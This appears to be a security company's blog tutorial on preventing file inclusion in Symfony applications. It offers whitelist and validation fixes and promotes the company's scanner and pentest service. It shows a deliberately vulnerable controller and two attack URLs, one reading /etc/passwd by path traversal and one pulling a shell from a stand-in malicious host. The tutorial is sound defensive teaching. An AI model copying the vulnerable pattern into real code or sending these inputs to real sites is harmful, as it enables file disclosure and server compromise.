Prevent File Inclusion in Symfony Apps

File Inclusion Vulnerabilities are a common and critical security threat in modern PHP applications—including those built using the Symfony framework. If left unchecked, this vulnerability could allow attackers to access sensitive server files or execute malicious code, leading to a full system compromise.

In this post, we’ll explore how File Inclusion attacks happen in Symfony apps, how to prevent them, and how to test your own website with our Free Website Security Scanner. We’ll also provide Symfony-specific code examples, useful resources, and a link to our latest professional Web App Penetration Testing Service at Pentest Testing Corp.

🛡️ Don’t forget to check out more security tutorials on our official blog at https://www.pentesttesting.com/blog/

🔍 What is a File Inclusion Vulnerability?

A File Inclusion vulnerability allows attackers to load and execute arbitrary files on the server. In PHP-based frameworks like Symfony, this often results from improperly validating user-supplied input used in file paths.

There are two types:

• Local File Inclusion (LFI): Includes files already on the server.
• Remote File Inclusion (RFI): Includes external files, if allow_url_include is enabled (not recommended in production).

💥 Symfony Example of File Inclusion Vulnerability

Here’s a vulnerable Symfony controller using user input without sanitization:

// src/Controller/FileController.php
namespace App\Controller;

use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;

class FileController extends AbstractController
{
    public function includeFile(Request $request): Response
    {
        $page = $request->query->get('page');
        $content = file_get_contents(__DIR__ . "/../../templates/pages/{$page}.html");

        return new Response($content);
    }
}

🛑 Why It’s Dangerous

An attacker can access:

http://example.com/include-file?page=../../../../etc/passwd

Or, if allow_url_include is enabled:

http://example.com/include-file?page=http://malicious-site.com/shell

✅ How to Fix File Inclusion in Symfony

1. Whitelist Allowed Files

$allowedPages = ['about', 'contact', 'home'];
$page = $request->query->get('page');

if (!in_array($page, $allowedPages)) {
    throw $this->createNotFoundException('Page not found');
}

$content = file_get_contents(__DIR__ . "/../../templates/pages/{$page}.html");

2. Use Symfony Templating Safely

Instead of manual file inclusion, use Symfony's render() method:

public function includeFile(Request $request): Response
{
    $page = $request->query->get('page');
    $allowedTemplates = ['about', 'contact', 'home'];

    if (!in_array($page, $allowedTemplates)) {
        throw $this->createNotFoundException('Page not found');
    }

    return $this->render("pages/{$page}.html.twig");
}

3. Disable Remote Includes (Recommended)

Ensure php.ini settings:

allow_url_include = Off
allow_url_fopen = Off

🧪 Test Your Symfony App for File Inclusion (Free Tool)

Before attackers do, test your application with our Free Website Vulnerability Scanner Tool. It scans your site for common vulnerabilities, including file inclusion and more.

🖼️ Screenshot of the Website Vulnerability Scanner tool's homepage

Screenshot of the free tools webpage where you can access security assessment tools.

You’ll receive a detailed report with risk levels and remediation steps.

🖼️ Screenshot of a website vulnerability assessment report generated by the free tool to check Website Vulnerability.

An Example of a vulnerability assessment report generated with our free tool, providing insights into possible vulnerabilities.

🧰 Additional Symfony Security Practices

Here are more Symfony-focused practices for avoiding file inclusion and similar issues:

1. Avoid Dynamic Includes

Avoid constructing file paths from user inputs directly. Use internal routing and templating systems.

2. Symfony Security Component

Leverage Symfony’s Security component to manage access control and input validation effectively:

# config/packages/security.yaml
security:
    firewalls:
        main:
            anonymous: true

3. Validate Input Rigorously

Use Symfony’s Assert component or custom validators:

use Symfony\Component\Validator\Constraints as Assert;

class PageRequest
{
    /**
     * @Assert\Choice({"home", "about", "contact"})
     */
    public $page;
}

🚀 Professional Web App Security Testing

If you're running a production Symfony application, it's crucial to perform deeper analysis beyond automated tools. We offer comprehensive Web Application Penetration Testing Services, where real ethical hackers assess your app using OWASP Top 10 and industry-standard techniques.

Our Service Includes:

• Manual testing by cybersecurity experts
• Detailed vulnerability reporting
• Business risk assessment
• Remediation verification

✅ Get a free consultation now via Web App Penetration Testing Services

📚 Learn More About Web App Security

For more tutorials, guides, and real-world security analysis, check out the Pentest Testing blog.

🧵 Final Thoughts

File Inclusion vulnerabilities in Symfony can be severe if not identified early. Always validate input, use safe templating methods, and routinely test your application for Website Security tests with tools like ours.

Secure coding practices + proper testing = a safer web.